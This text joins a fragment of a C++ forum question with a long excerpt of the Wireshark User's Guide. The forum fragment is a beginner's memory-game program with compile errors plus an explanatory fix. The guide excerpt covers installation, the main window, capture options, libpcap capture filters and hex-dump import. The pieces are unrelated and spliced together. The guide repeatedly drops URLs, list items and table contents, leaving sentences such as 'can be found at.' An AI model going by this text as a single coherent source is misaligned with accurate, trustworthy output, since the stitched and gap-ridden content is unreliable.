    cout<<"You will be given 20 numbers from 0 to 100 and you have 30 seconds to memorize them \n";
    cout<<"Then you will be tested... \n";
    Sleep(1000);
    cout<<"3 \n";
    Sleep(1000);
    cout<<"2 \n";
    Sleep(1000);
    cout<<"1 \n";
    Sleep(1000);
    system("cls");
    numberarray = 1;
    for ( 1 == 1 )
    {
        numberarray[numberarrayplace] = rand(100);
        cout<< numberarray[numberarrayplace] << " ";
    }
    cout<<"Here are your numbers \n";
    Sleep(30000);
    cout<<"Times up! \n";
}

I'm getting these errors:

C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp In function `int main()':
29 C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp incompatible types in assignment of `int' to `int[20]'
30 C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp expected `;' before ')' token
35 C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp expected `)' before ';' token
C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\Makefile.win [Build Error] [main.o] Error 1

I appreciate your help.
Gillypie
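Editor's note: the three errors come from three lines. `numberarray = 1;` assigns an int to an array, `for ( 1 == 1 )` is not a valid loop header, and `rand(100)` passes an argument to rand(), which takes none. A minimal corrected sketch of the array-filling part (the Sleep/system calls and prompts are left out; the function name is invented):

```cpp
#include <cstdlib>

// Corrected sketch of the array-filling part of the program:
// - use an index variable instead of assigning to the array itself,
// - use a counted for loop instead of `for (1 == 1)`,
// - rand() takes no arguments, so bound the result with the modulo operator.
void fillRandomNumbers(int* out, int count) {
    for (int i = 0; i < count; ++i) {
        out[i] = std::rand() % 101; // random number in 0..100 inclusive
    }
}
```

In main() this replaces the `numberarray = 1; for ( 1 == 1 ) ...` block: keep `int numberarray[20];`, call `fillRandomNumbers(numberarray, 20);`, then print the values in a loop.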
http://cboard.cprogramming.com/cplusplus-programming/95791-program-not-working.html
Wireshark is the world’s foremost network protocol analyzer, but the rich feature set can be daunting for the unfamiliar. This document is part of an effort by the Wireshark team to improve Wireshark’s usability. We hope that you find it useful and look forward to your comments.

The intended audience of this book is anyone using Wireshark. This book explains all of the basic and some advanced features of Wireshark. As Wireshark has become a very complex program, not every feature may be explained in this book; it is intended to be useful for both new and experienced Wireshark users.

The authors would like to thank the whole Wireshark team for their assistance. In particular, the authors would like to thank:

The authors would also like to thank the following people for their helpful feedback on this document:

The authors would like to acknowledge those man page and README authors for the Wireshark project from whom sections of this document borrow heavily:

The mergecap man page, from which Section D.8, “mergecap: Merging multiple capture files into one” is derived.

The text2pcap man page, from which Section D.9, “text2pcap: Converting ASCII hexdumps to network captures” is derived.

This book was originally developed by Richard Sharpe with funds provided from the Wireshark Fund. It was updated by Ed Warnicke and more recently redesigned and updated by Ulf Lamping. It was originally written in DocBook/XML and converted to AsciiDoc by Gerald Combs. The latest copy of this documentation can always be found at.

Should you have any feedback about this document, please send it to the authors through wireshark-dev[AT]wireshark.org.

The following table shows the typographic conventions that are used in this guide.

Bourne shell, normal user.
$ # This is a comment
$ git config --global log.abbrevcommit true

Bourne shell, root user.
# # This is a comment
# ninja install

Command Prompt (cmd.exe).
>rem This is a comment
>cd C:\Development

PowerShell.
PS$># This is a comment
PS$> choco list -l

C Source Code.
#include "config.h"

/* This method dissects foos */
static int
dissect_foo_message(tvbuff_t *tvb, packet_info *pinfo _U_, proto_tree *tree _U_, void *data _U_)
{
    /* TODO: implement your dissecting code */
    return tvb_captured_length(tvb);
}

In the past, such tools were either very expensive, proprietary, or both. However, with the advent of Wireshark, that has changed. Wireshark is available for free, is open source, and is one of the best packet analyzers available today.

Here are some reasons people use Wireshark:

Wireshark can also be helpful in many other situations.

The following are some of the many features Wireshark provides:

However, to really appreciate its power you have to start using it. Figure 1.1, “Wireshark captures packets and lets you examine their contents.” shows Wireshark having captured some packets and waiting for you to examine them.

Wireshark can capture traffic from many different network media types, including Ethernet, Wireless LAN, Bluetooth, USB, and more. The specific media types supported may be limited by several factors, including your hardware and operating system. An overview of the supported media types can be found at.

Wireshark can open packet captures from a large number of capture programs. For a list of input formats see Section 5.2.2, “Input File Formats”.

Wireshark can save captured packets in many formats, including those used by other capture programs. For a list of output formats see Section 5.3.2, “Output File Formats”.

There are protocol dissectors (or decoders, as they are known in other products) for a great many protocols: see Appendix C, Protocols and Protocol Fields.

Wireshark is an open source software project, and is released under the GNU General Public License (GPL). You can freely use Wireshark on any number of computers you like, without worrying about license keys or fees. In addition, all source code is freely available under the GPL.
Because of that, it is very easy for people to add new protocols to Wireshark, either as plugins or built into the source, and they often do!

Here are some things Wireshark does not provide:

If Wireshark runs out of memory it will crash. See for details and workarounds.

Although Wireshark uses a separate process to capture packets, the packet analysis is single-threaded and won’t benefit much from multi-core systems.

Wireshark should support any version of Windows that is still within its extended support lifetime. At the time of writing this includes Windows 10, 8.1, Server 2019, Server 2016, Server 2012 R2, and Server 2012. It also requires the following:

A supported network card for capturing

Older versions of Windows which are outside Microsoft’s extended lifecycle support window are no longer supported. It is often difficult or impossible to support these systems due to circumstances beyond our control, such as third party libraries on which we depend, or due to necessary features that are only present in newer versions of Windows, such as hardened security or memory management. See the Wireshark release lifecycle page for more details.

Wireshark supports macOS 10.12 and later. Similar to Windows, supported macOS versions depend on third party libraries and on Apple’s requirements. The system requirements should be comparable to the specifications listed above for Windows.

Wireshark runs on most UNIX and UNIX-like platforms including Linux and most BSD variants. The system requirements should be comparable to the specifications listed above for Windows. Binary packages are available for most Unices and Linux distributions including the following platforms:

If a binary package is not available for your platform you can download the source and try to build it. Please report your experiences to wireshark-dev[AT]wireshark.org.

You can get the latest copy of the program from the Wireshark website at.
The download page should automatically highlight the appropriate download for your platform and direct you to the nearest mirror. Official Windows and macOS installers are signed by the Wireshark Foundation. macOS installers are also notarized. A new Wireshark version typically becomes available every six weeks. If you want to be notified about new Wireshark releases you should subscribe to the wireshark-announce mailing list. You will find more details in Section 1.6.5, “Mailing Lists”.

Each release includes a list of file hashes which are sent to the wireshark-announce mailing list and placed in a file named SIGNATURES-x.y.z.txt. Announcement messages are archived at and SIGNATURES files can be found at. Both are GPG-signed and include verification instructions for Windows, Linux, and macOS. As noted above, you can also verify downloads on Windows and macOS using the code signature validation features on those systems.

In late 1997 Gerald Combs needed a tool for tracking down network problems and wanted to learn more about networking, so he started writing Ethereal (the original name of the Wireshark project) as a way to solve both problems. Ethereal was initially released, after several pauses in development, in July 1998 as version 0.2.0. Within days patches, bug reports, and words of encouragement started arriving and Ethereal was on its way to success. Not long after that Gilbert Ramirez saw its potential and contributed a low-level dissector to it. In October 1998 Guy Harris started applying patches and contributing dissectors to Ethereal. The list of people who have contributed to the project has become very long since then, and almost all of them started with a protocol that they needed that Wireshark or Ethereal did not already handle. So they copied an existing dissector and contributed the code back to the team.

In 2006 the project moved house and re-emerged under a new name: Wireshark. In 2008, after ten years of development, Wireshark finally arrived at version 1.0. This release was the first deemed complete, with the minimum features implemented.
Its release coincided with the first Wireshark Developer and User Conference, called Sharkfest. In 2015 Wireshark 2.0 was released, which featured a new user interface.

The Wireshark source code and binary kits for some platforms are all available on the download page of the Wireshark website.

As with all things there must be a beginning, and so it is with Wireshark. To use Wireshark you must first install it. If you are running Windows or macOS you can download an official release at, install it, and skip the rest of this chapter. If you are running another operating system such as Linux or FreeBSD you might want to install from source. Several Linux distributions offer Wireshark packages but they commonly provide out-of-date versions. No other versions of UNIX ship Wireshark so far. For that reason, you will need to know where to get the latest version of Wireshark and how to install it.

This chapter shows you how to obtain source and binary packages and how to build Wireshark from source should you choose to do so. The general steps are the following:

You can obtain both source and binary distributions from the Wireshark web site. Select the download link and then select the desired binary or source package.

Windows installer names contain the platform and version. For example, Wireshark-win64-3.5.0.exe installs Wireshark 3.5.0 for 64-bit Windows. The official Wireshark Windows package will check for new versions and notify you when they are available. If you have the “Check for updates” preference disabled or if you run Wireshark in an isolated environment you should subscribe to the wireshark-announce mailing list.

On macOS you must grant Wireshark access to BPF devices before you can capture. You can do so by opening the Install ChmodBPF.pkg file in the Wireshark .dmg, or from Wireshark itself by opening Wireshark → About Wireshark, selecting the “Folders” tab, and double-clicking “macOS Extras”. The installer package includes Wireshark along with ChmodBPF and system path packages. See the included Read me first.html file for more details.

Building.
In general installing the binary under your version of UNIX will be specific to the installation methods used with your version of UNIX. For example, under AIX you would use smit to install the Wireshark binary package, while under Tru64 UNIX (formerly Digital UNIX) you would use setld.

Building RPMs from Wireshark’s source code results in several packages (most distributions follow the same system):

The wireshark package contains the core Wireshark libraries and command-line tools.

The wireshark or wireshark-qt package contains the Qt-based GUI.

Many distributions use yum or a similar package management tool to make installation of software (including its dependencies) easier. If your distribution uses yum, use the following command to install Wireshark together with the Qt GUI:

yum install wireshark wireshark-qt

If you’ve built your own RPMs from the Wireshark sources you can install them by running, for example:

rpm -ivh wireshark-2.0.0-1.x86_64.rpm wireshark-qt-2.0.0-1.x86_64.rpm

If the above command fails because of missing dependencies, install the dependencies first, and then retry the step above.

If you can just install from the repository then use:

apt install wireshark

Apt should take care of all of the dependency issues for you.

Use the following command to install Wireshark under Gentoo Linux with all of the extra features:

USE="c-ares ipv6 snmp ssl kerberos threads selinux" emerge wireshark

A number of errors can occur during the build and installation process. Some hints on solving these are provided here. If the cmake stage fails you will need to find out why. You can check the files CMakeOutput.log and CMakeError.log in the build directory to find out what failed. The last few lines of these files should help in determining the problem.

The standard problems are that you do not have a required development package on your system or that the development package isn’t new enough. Note that installing a library package isn’t enough.
You need to install its development package as well. cmake will also fail if you do not have libpcap (at least the required include files) on your system.

If you cannot determine what the problems are, send an email to the wireshark-dev mailing list explaining your problem. Include the output from cmake and anything else you think is relevant, such as a trace of the make stage.

By now you have installed Wireshark and are likely keen to get started capturing your first packets. In the next chapters we will explore:

You can start Wireshark from your shell or window manager.

In the following chapters a lot of screenshots from Wireshark will be shown. As Wireshark runs on many different platforms with many different window managers, different styles applied, and different versions of the underlying GUI toolkit, your screen might look different from the screenshots shown here.

Wireshark’s main window consists of parts that are commonly known from many other GUI programs.

Packet list and detail navigation can be done entirely from the keyboard. Table 3.1, “Keyboard Navigation” shows a list of keystrokes that will let you quickly move around a capture file. See Table 3.6, “Go menu items” for additional navigation keystrokes. → → will show a list of all shortcuts in the main window. Additionally, typing anywhere in the main window will start filling in a display filter.

Wireshark’s main menu is located either at the top of the main window (Windows, Linux) or at the top of your main screen (macOS). An example is shown in Figure 3.2, “The Menu”. The main menu contains the following items:

Each of these menu items is described in more detail in the sections that follow.

The Wireshark File menu contains the fields shown in Table 3.2, “File menu items”.

The Wireshark Edit menu contains the fields shown in Table 3.3, “Edit menu items”.
The Wireshark View menu contains the fields shown in Table 3.4, “View menu items”.

The Wireshark Go menu contains the fields shown in Table 3.6, “Go menu items”.

The Wireshark Capture menu contains the fields shown in Table 3.7, “Capture menu items”.

The Wireshark Analyze menu contains the fields shown in Table 3.8, “Analyze menu items”.

The Wireshark Statistics menu contains the fields shown in Table 3.9, “Statistics menu items”. Each menu item brings up a new window showing specific statistics.

The Wireshark Telephony menu contains the fields shown in Table 3.10, “Telephony menu items”. Each menu item shows specific telephony related statistics.

The Wireless menu lets you analyze Bluetooth and IEEE 802.11 wireless LAN activity, as shown in Figure 3.11, “The “Wireless” Menu”. Each menu item shows specific Bluetooth and IEEE 802.11 statistics.

The Wireshark Tools menu contains the fields shown in Table 3.12, “Tools menu items”.

The Wireshark Help menu contains the fields shown in Table 3.13, “Help menu items”.

The main toolbar provides quick access to frequently used items from the menu. This toolbar cannot be customized by the user, but it can be hidden using the View menu if the space on the screen is needed to show more packet data. Items in the toolbar will be enabled or disabled (greyed out) similar to their corresponding menu items. For example, the image below shows the main window toolbar after a file has been opened. Various file-related buttons are enabled, but the stop capture button is disabled because a capture is not in progress.

The filter toolbar lets you quickly edit and apply display filters. More information on display filters is available in Section 6.3, “Filtering Packets While Viewing”.

The packet bytes pane shows the data of the current packet (selected in the “Packet List” pane) in a hexdump style. The “Packet Bytes” pane shows a canonical hex dump of the packet data.
Each line contains the data offset, sixteen hexadecimal bytes, and sixteen ASCII bytes. Non-printable bytes are replaced with a period (“.”).

Depending on the packet data, sometimes more than one page is available, e.g. when Wireshark has reassembled some packets into a single chunk of data. (See Section 7.8, “Packet Reassembly” for details.) In this case you can see each data source by clicking its corresponding tab at the bottom of the pane. Additional pages typically contain data reassembled from multiple packets or decrypted data. The context menu (right mouse click) of the tab labels will show a list of all available pages. This can be helpful if the pane is too small for all the tab labels.

The statusbar displays informational messages. In general, the left side will show context related information, the middle part will show information about the current capture file, and the right side will show the selected configuration profile. Drag the handles between the text areas to change the size.

This statusbar is shown while no capture file is loaded, e.g. when Wireshark is started.

The middle part shows the current number of packets in the capture file. The following values are displayed:

For a detailed description of configuration profiles, see Section 11.6, “Configuration Profiles”.

This is displayed if you have selected a protocol field in the “Packet Details” pane.

This is displayed if you are trying to use a display filter which may have unexpected results. For a detailed description see Section 6.4.7, “A Common Mistake with !=”.

Capturing live network data is one of the major features of Wireshark. The Wireshark capture engine provides the following features:

The capture engine still lacks the following features:

Setting up Wireshark to capture packets for the first time can be tricky. A comprehensive guide “How To setup a Capture” is available at.
Here are some common pitfalls:

If you have any problems setting up your capture environment you should have a look at the guide mentioned above.

The following methods can be used to start capturing packets with Wireshark:

$ wireshark -i eth0 -k

This will start Wireshark capturing on interface eth0. More details can be found at Section 11.2, “Start Wireshark from the command line”.

When you open Wireshark without starting a capture or opening a capture file it will display the “Welcome Screen,” which lists any recently opened capture files and available capture interfaces. Network activity for each interface will be shown in a sparkline next to the interface name. It is possible to select more than one interface and capture from them simultaneously.

Some interfaces allow or require configuration prior to capture. This will be indicated by a configuration icon to the left of the interface name. Clicking on the icon will show the configuration dialog for that interface.

Hovering over an interface will show any associated IPv4 and IPv6 addresses and its capture filter.

Wireshark isn’t limited to just network interfaces — on most systems you can also capture USB, Bluetooth, and other types of packets. Note also that an interface might be hidden if it’s inaccessible to Wireshark or if it has been hidden as described in Section 4.6, “The “Manage Interfaces” Dialog Box”.

When you select Capture → Options… (or use the corresponding item in the main toolbar), Wireshark pops up the “Capture Options” dialog box as shown in Figure 4.3, “The “Capture Options” input tab”. If you are unsure which options to choose in this dialog box, leaving the default settings as they are should work well in many cases.

The “Input” tab contains the “Interface” table, which shows the following columns:

Hovering over an interface or expanding it will show any associated IPv4 and IPv6 addresses.
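The capture options above all have command-line equivalents. As a hypothetical sketch (the interface name, filter, and file name are invented, not from the text), the block below only composes and prints the command rather than running it:

```shell
# -i selects the interface, -k starts capturing immediately,
# -f sets a capture filter, -w writes the captured packets to a file.
IFACE=eth0
FILTER='tcp port 80'
OUTFILE=/tmp/http.pcapng

CAPTURE_CMD="wireshark -i $IFACE -k -f '$FILTER' -w $OUTFILE"
echo "$CAPTURE_CMD"
```

Running the printed command is equivalent to selecting the interface, entering the capture filter, choosing an output file in the “Output” tab, and pressing Start.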
If “Enable promiscuous mode on all interfaces” is enabled, the individual promiscuous mode settings above will be overridden.

“Capture filter for selected interfaces” can be used to set a filter for more than one interface at the same time.

The “Manage Interfaces” button opens Figure 4.6, “The “Manage Interfaces” dialog box”, where pipes can be defined, local interfaces scanned or hidden, or remote interfaces added.

The “Compile BPFs” button opens Figure 4.7, “The “Compiled Filter Output” dialog box”, which shows you the compiled bytecode for your capture filter. This can help to better understand the capture filter you created.

The “Output” tab shows the following information:

Sets the conditions for switching to a new capture file. A new capture file can be created based on the following conditions:

More details about capture files can be found in Section 4.8, “Capture files and file modes”.

The “Options” tab shows the following information:

See Section 7.9, “Name Resolution” for more details on each of these options.

Capturing can be stopped based on the following conditions:

You can click Start from any tab to commence the capture or to apply your changes and close the dialog.

The “Manage Interfaces” dialog box initially shows the “Local Interfaces” tab, which lets you manage the following:

The “Pipes” tab lets you capture from a named pipe. To successfully add a pipe, its associated named pipe must have already been created. Click the plus (+) button and type the name of the pipe including its path. Alternatively, the pipe can be located with the browse button. To remove a pipe from the list of interfaces, select it and press the minus (-) button.

On Microsoft Windows, the “Remote Interfaces” tab lets you capture from an interface on a different machine. The Remote Packet Capture Protocol service must first be running on the target platform before Wireshark can connect to it. The easiest way is to install Npcap on the target. Once installation is completed go to the Services control panel, find the Remote Packet Capture Protocol service, and start it.
On Linux or Unix you can capture (and do so more securely) through an SSH tunnel.

To add a new remote capture interface, click the plus (+) button and specify the following:

Each interface can optionally be hidden. In contrast to the local interfaces they are not saved in the preferences file. To remove a host including all of its interfaces from the list, select it and click the minus (-) button.

This figure shows the results of compiling the BPF filter for the selected interfaces. In the list on the left the interface names are listed. The results of compiling a filter for the selected interface are shown on the right.

While capturing, the underlying libpcap capturing engine will grab the packets from the network card and keep the packet data in a (relatively) small kernel buffer.

In most cases you won’t have to modify the link-layer header type. Some exceptions are as follows:

If you are capturing on an Ethernet device you might be offered a choice of “Ethernet” or “DOCSIS”. If you are capturing traffic from a Cisco Cable Modem Termination System that is putting DOCSIS traffic onto the Ethernet to be captured, select “DOCSIS”, otherwise select “Ethernet”.

If you are capturing on an 802.11 device on some versions of BSD you might be offered a choice of “Ethernet” or “802.11”. “Ethernet” will cause the captured packets to have fake (“cooked”) Ethernet headers. “802.11” will cause them to have full IEEE 802.11 headers. Unless the capture needs to be read by an application that doesn’t support 802.11 headers you should select “802.11”.

If you are capturing on an Endace DAG card connected to a synchronous serial line you might be offered a choice of “PPP over serial” or “Cisco HDLC”. If the protocol on the serial line is PPP, select “PPP over serial”; if the protocol on the serial line is Cisco HDLC, select “Cisco HDLC”.

If you are capturing on an Endace DAG card connected to an ATM network you might be offered a choice of “RFC 1483 IP-over-ATM” or “Sun raw ATM”.
If the only traffic being captured is RFC 1483 LLC-encapsulated IP, or if the capture needs to be read by an application that doesn’t support SunATM headers, select “RFC 1483 IP-over-ATM”, otherwise select “Sun raw ATM”. Wireshark supports limiting the packet capture to packets that match a capture filter. Wireshark capture filters are written in the libpcap filter language. Below is a brief overview of the libpcap filter language’s syntax. Complete documentation can be found at the pcap-filter man page. You can find many Capture Filter examples at. You enter the capture filter into the “Filter” field of the Wireshark “Capture Options” dialog box, as shown in Figure 4.3, “The “Capture Options” input tab”. A capture filter takes the form of a series of primitive expressions connected by conjunctions (and/or) and optionally preceded by not: [not] primitive [and|or [not] primitive ...] An example is shown in Example 4.1, “A capture filter for telnet that captures traffic to and from a particular host”. Example 4.1. A capture filter for telnet that captures traffic to and from a particular host tcp port 23 and host 10.0.0.5 This example captures telnet traffic to and from the host 10.0.0.5, and shows how to use two primitives and the and conjunction. Another example is shown in Example 4.2, “Capturing all telnet traffic not from 10.0.0.5”, which shows how to capture all telnet traffic except that from 10.0.0.5. This primitive allows you to filter on TCP and UDP port numbers. You can optionally precede this primitive with the keywords src|dst and tcp|udp, which allow you to specify that you are only interested in source or destination ports and TCP or UDP packets respectively. The keywords tcp|udp must appear before src|dst. If these are not specified, packets will be selected for both the TCP and UDP protocols and when the specified address appears in either the source or destination port field. If Wireshark is running remotely (using e.g.
SSH, an exported X11 window, a terminal server, …), the remote content has to be transported over the network, adding a lot of (usually unimportant) packets to the actually interesting traffic. To avoid this, Wireshark tries to figure out if it’s remotely connected (by looking at some specific environment variables) and automatically creates a capture filter that matches aspects of the connection. The following environment variables are analyzed: SSH_CONNECTION (ssh), SSH_CLIENT (ssh), REMOTEHOST (tcsh, others?), DISPLAY (x11), and SESSIONNAME (terminal server). On Windows it asks the operating system if it’s running in a Remote Desktop Services environment. You might see the following dialog box while a capture is running: This dialog box shows a list of protocols and their activity over time. It can be enabled via the “capture.show_info” setting in the “Advanced” preferences. A running capture session will be stopped in one of the following ways: A running capture session can be restarted with the same capture options as the last time; this will remove all packets previously captured. This can be useful if some uninteresting packets are captured and there’s no need to keep them. Restart is a convenience function and is equivalent to a capture stop followed by an immediate capture start. A restart can be triggered in one of the following ways: Table of Contents This chapter will describe input and output of capture data. Wireshark can read in previously saved capture files. To read them, simply select the File → Open menu or toolbar item. Wireshark will then pop up the “File Open” dialog box, which is discussed in more detail in Section 5.2.1, “The “Open Capture File” Dialog Box”. If you haven’t previously saved the current capture file you will be asked to do so to prevent data loss. This warning can be disabled in the preferences. In addition to its native file format (pcapng), Wireshark can read and write capture files from a large number of other packet capture programs as well.
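As an illustration of the primitive grammar from Example 4.1 above, here is a small Python sketch. The helper names and the packet dictionary are hypothetical (this is not Wireshark or libpcap code), but the matching rules mirror the text: an unqualified host or port primitive matches either the source or the destination field.

```python
# Hypothetical illustration of libpcap primitive semantics (not Wireshark code).
# An unqualified "host" or "port" primitive matches source OR destination.

def match_host(pkt, addr):
    return addr in (pkt["src"], pkt["dst"])

def match_port(pkt, port, proto=None):
    if proto is not None and pkt["proto"] != proto:
        return False
    return port in (pkt["sport"], pkt["dport"])

# "tcp port 23 and host 10.0.0.5" from Example 4.1, as a predicate:
def telnet_filter(pkt):
    return match_port(pkt, 23, proto="tcp") and match_host(pkt, "10.0.0.5")

pkt = {"proto": "tcp", "src": "10.0.0.5", "dst": "10.0.0.99",
       "sport": 1025, "dport": 23}
print(telnet_filter(pkt))  # True: telnet traffic from 10.0.0.5
```

The point of the sketch is the either-direction matching: the same filter also accepts the reply packets, where 10.0.0.5 and port 23 appear on the other side.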
See Section 5.2.2, “Input File Formats” for the list of capture formats Wireshark understands. The “Open Capture File” dialog box allows you to search for a capture file containing previously captured packets for display in Wireshark. The following sections show some examples of the Wireshark “Open File” dialog box. The appearance of this dialog depends on the system. However, the functionality should be the same across systems. Common dialog behaviour on all systems: Wireshark adds the following controls: This is the common Windows file open dialog along with some Wireshark extensions. This is the common Qt file open dialog along with some Wireshark extensions. The native capture file formats used by Wireshark are: The following file formats from other capture tools can be opened by Wireshark: New file formats are added from time to time. It may not be possible to read some formats depending on the packet types captured. Ethernet captures are usually supported for most file formats, but it may not be possible to read other packet types such as PPP or IEEE 802.11 from all file formats. Sometimes you need to merge several capture files into one. For example, this can be useful if you have captured from multiple interfaces at once (e.g. using multiple instances of Wireshark). There are three ways to merge capture files using Wireshark: You can use the mergecap tool from the command line to merge capture files. This tool provides the most options to merge capture files. See Section D.8, “mergecap: Merging multiple capture files into one” for details. This lets you select a file to be merged into the currently loaded file. If your current data has not been saved you will be asked to save it first. Most controls of this dialog will work the same way as described in the “Open Capture File” dialog box. See Section 5.2.1, “The “Open Capture File” Dialog Box” for details.
Specific controls of this merge dialog are: This is the common Windows file open dialog with additional Wireshark extensions. This is the Qt file open dialog with additional Wireshark extensions. Wireshark can read in a hex dump and write the data described into a temporary libpcap capture file. It can read hex dumps with multiple packets in them, and build a capture file of multiple packets. It is also capable of generating dummy Ethernet, IP, UDP, TCP, or SCTP headers, in order to build fully processable packet dumps from hexdumps of application-level data only. Alternatively, a dummy PDU header can be added to specify a dissector the data should be passed to initially. Two methods for converting the input are supported: Wireshark understands a hexdump of the form generated by od -Ax -tx1 -v. Each line begins with an offset, which is a hex number (it can also be octal or decimal) of more than two hex digits. Here is a sample dump that can be imported. Byte and hex numbers can be uppercase or lowercase. Any text before the offset is ignored, including email forwarding characters >. Any lines of text between the bytestring lines are ignored. If timestamps are present in the text file they are used; if not, the first packet is timestamped with the current time at which the import takes place. Multiple packets are written with timestamps differing by one nanosecond each. In general, short of these restrictions, Wireshark is pretty liberal about reading in hexdumps. Currently there are no directives implemented. In the future these may be used to give more fine-grained control over the dump and the way it should be processed, e.g. timestamps, encapsulation type, etc. Wireshark is also capable of scanning the input using a custom Perl-compatible regular expression as specified by GLib’s GRegex. Using a regex capturing a single packet in the given file, Wireshark will search the given file from the start to the second-to-last character (the last character has to be \n and is ignored) for non-overlapping (and non-empty) strings matching the given regex, and then identify the fields to import using named capturing subgroups.
Using the provided format information for each field, they are then decoded and translated into a standard libpcap file, retaining packet order. Note that each named capturing subgroup has to match exactly once per packet, but it may be present multiple times in the regex. For example, the following dump:

> 0:00:00.265620 a130368b000000080060
> 0:00:00.280836 a1216c8b00000000000089086b0b82020407
< 0:00:00.295459 a2010800000000000000000800000000
> 0:00:00.296982 a1303c8b00000008007088286b0bc1ffcbf0f9ff
> 0:00:00.305644 a121718b0000000000008ba86a0b8008
< 0:00:00.319061 a2010900000000000000001000600000
> 0:00:00.330937 a130428b00000008007589186b0bb9ffd9f0fdfa3eb4295e99f3aaffd2f005
> 0:00:00.356037 a121788b0000000000008a18

could be imported using these settings:

regex: ^(?<dir>[<>])\s(?<time>\d+:\d\d:\d\d.\d+)\s(?<data>[0-9a-fA-F]+)$
timestamp: %H:%M:%S.%f
dir: in: < out: >
encoding: HEX

Caution has to be applied when discarding the anchors ^ and $, as the input is searched, not parsed, meaning even most incorrect regexes will produce valid-looking results when not anchored (however, anchors are not guaranteed to prevent this). It is generally recommended to sanity-check any files created using this conversion. Supported fields:

data: The actual captured frame data. The only mandatory field. This should match the encoded binary data captured and is used as the actual frame data to import.

time: The timestamp for the packet. The captured field will be parsed according to the given timestamp format into a timestamp. If no timestamp is present, an arbitrary counter will count up seconds and nanoseconds by one each packet.

dir: The direction the packet was sent over the wire. The captured field is expected to be one character in length; any remaining characters are ignored (e.g. given "Input" only the 'I' is looked at). This character is compared to lists of characters corresponding to inbound and outbound, and the packet is assigned the corresponding direction.
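As an aside, the sample dump and regex settings above can be sanity-checked with Python's re module. Note that GRegex's (?<name>…) named groups must be written (?P<name>…) in Python; this is an independent check of the pattern, not the importer's code.

```python
import re

# The GRegex pattern from the settings above, with (?<name>...) rewritten
# as Python's (?P<name>...). Illustration only, not Wireshark code.
pattern = re.compile(
    r"^(?P<dir>[<>])\s(?P<time>\d+:\d\d:\d\d\.\d+)\s(?P<data>[0-9a-fA-F]+)$",
    re.MULTILINE,
)

dump = """> 0:00:00.265620 a130368b000000080060
> 0:00:00.280836 a1216c8b00000000000089086b0b82020407
< 0:00:00.295459 a2010800000000000000000800000000
> 0:00:00.296982 a1303c8b00000008007088286b0bc1ffcbf0f9ff
> 0:00:00.305644 a121718b0000000000008ba86a0b8008
< 0:00:00.319061 a2010900000000000000001000600000
> 0:00:00.330937 a130428b00000008007589186b0bb9ffd9f0fdfa3eb4295e99f3aaffd2f005
> 0:00:00.356037 a121788b0000000000008a18"""

packets = [m.groupdict() for m in pattern.finditer(dump)]
print(len(packets))                        # 8 packets found
print(packets[0]["dir"])                   # '>', i.e. outbound per "out: >"
frame = bytes.fromhex(packets[0]["data"])  # decoded per "encoding: HEX"
print(frame[:2].hex())                     # 'a130'
```

Each named subgroup matches exactly once per line, so groupdict() yields one dir/time/data record per packet, mirroring what the importer extracts.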
If neither list yields a match, the direction is set to unknown. If this field is not specified, the entire file has no directional information.

seqno: An ID for this packet. Each packet can be assigned an arbitrary ID that can be used as a field by Wireshark. This field is assumed to be a positive integer in base 10. It can be used, for example, to reorder out-of-order captures after the import. If this field is not given, no IDs will be present in the resulting file.

This dialog box lets you select a text file, containing a hex dump of packet data, to be imported, and set import parameters. Specific controls of this import dialog are split into three sections: This section is split into the two alternatives for input conversion, accessible in the two tabs “Hex Dump” and “Regular Expression”. In addition to the conversion-mode-specific inputs, there are also common parameters, currently only the timestamp format. The anchors ^ and $ are set to match directly before and after newlines \n or \r\n. See GRegex for full documentation. The encoding used for the binary data. Supported encodings are plain hexadecimal, octal, binary, and base64. Plain here means no additional characters are present in the data field beyond whitespace, which is ignored. Any unexpected characters abort the import process. Ignored whitespace characters are \r, \n, \t, \v, and space, plus : for hex only and = for base64 only. Any incomplete bytes at the field’s end are assumed to be padding to fill the last complete byte. These bits should be zero; however, this is not checked. This option is only available when a (?<dir>…) group is present. This is the format specifier used to parse the timestamps in the text file to import. It uses the same format as strptime(3), with the addition of %f for zero-padded fractions of seconds. The precision of %f is determined from its length. The most common fields are %H, %M and %S for hours, minutes and seconds. The straightforward HH:MM:SS format is covered by %T.
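Python's strptime happens to support a similar %f directive for fractional seconds, so a format string like the one in the settings above can be checked quickly. This is only a rough analogue: Python's %f always denotes microseconds, not the importer's length-derived precision.

```python
from datetime import datetime

# Parsing a timestamp like those in the sample dump with "%H:%M:%S.%f".
# Python's strptime accepts 1-6 fractional digits for %f (microseconds).
ts = datetime.strptime("0:00:00.265620", "%H:%M:%S.%f")
print(ts.hour, ts.minute, ts.second, ts.microsecond)  # 0 0 0 265620
```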
For a full definition of the syntax, see strptime(3). In Regex mode this field is only available when a (?<time>…) group is present. In Hex Dump mode, if there are no timestamps in the text file to import, leave this field empty and timestamps will be generated based on the time of import. Once all input and import parameters are set up, click Import to start the import. If your current data wasn’t saved before, you will be asked to save it first. If the import button doesn’t unlock, make sure all encapsulation parameters are in the expected range and all unlocked fields are populated when using regex mode (the placeholder text is not used as a default). When completed, there will be a new capture file loaded with the frames imported from the text file. Wireshark provides a variety of options for exporting packet data. This section describes general ways to export data from the main Wireshark application. There are many other ways to export or extract data from capture files, including processing tshark output and customizing Wireshark and tshark using Lua scripts. This is similar to the “Save” dialog box, but it lets you save specific packets. This can be useful for trimming irrelevant or unwanted packets from a capture file. See Packet Range for details on the range controls. This lets you save the packet list, packet details, and packet bytes as plain text, CSV, JSON, and other formats. The format can be selected from the “Export As” dropdown and further customized using the “Packet Range” and “Packet Format” controls. Some controls are unavailable for some formats, notably CSV and JSON. The following formats are supported: Here are some examples of exported data: Plain text. No.
